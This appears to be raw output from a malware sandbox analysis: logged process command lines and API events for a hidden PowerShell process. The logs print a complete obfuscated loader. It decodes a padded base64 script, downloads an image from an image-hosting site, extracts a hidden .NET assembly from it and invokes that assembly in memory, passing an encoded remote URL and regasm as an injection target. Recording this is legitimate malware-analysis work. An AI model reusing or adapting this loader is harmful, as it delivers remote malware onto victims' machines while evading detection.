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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('UyQMlvG','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([STRINg]$verboSePrefeRenCe)[1,3]+'x'-join'')( ('N6zimageUrl = 9mBhttps://uploa'+'ddeimagen'+'s.com.br/images/004/654/536/original/new_image.'+'jpg?16989577509mB;N6zwebClient'+' = New-Object System.Net.WebClient;N6zimageBytes = N6zwebClient.DownloadData(N6zi'+'mageUrl);N6zimageText = [System.Text.Encoding]::UTF8.GetString(N6zimageBytes);N6zstartFlag = 9mB<<BASE64_START>>9mB;N6zendFlag = 9mB<<BASE64_END>>9mB;N6zstartInd'+'ex = N6zim'+'ageText.IndexOf(N6z'+'st'+'artFlag);N6zendIndex = N6zimageText.IndexOf(N6zendFlag);N6zstartIndex -ge 0 -and N6zendIndex -gt N6zstartIndex;N6zstartIndex'+' += N6z'+'startFlag.Le'+'ngth;N6zbase64Length = N6zendIndex - N6zstartIndex;N6zbase64Command = N6zimageText.Substring(N6zstartIndex, N6zbase'+'64Length);N6zcommandBytes = [System.Co'+'nvert]::Fr'+'omBase64String(N6zbase64Command'+');N6zloadedAssembly = [System.Reflection.Assembly]::Load(N6zcommandBytes);N6'+'ztype = N6zloade'+'dAssembly.GetT'+'ype(9mBFiber.Home9mB);N6zmethod = N6ztype.GetMethod(9mBVAI9mB).Inv'+'oke(N6znull, [object[]] (9mBdHh0LkNCTi8wNTIvMjMuOTQyLj'+'cyMS44ODEvLzpwdHRo9mB , 9mB9mB , 9mB29mB , 9mBregasm9mB , 9mB69mB , 9mBC:THfWindowsTHfTempTHf9mB, 9mBhtmlcvg9mB))').rePlACE('THf',[striNg][CHaR]92).rePlACE('N6z',[striNg][CHaR]36).rePlACE('9mB',[striNg][CHaR]39) )"

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Nov. 13, 2023, 10:55 a.m.	thread_identifier: 2712 thread_handle: 0x00000574 process_identifier: 2708 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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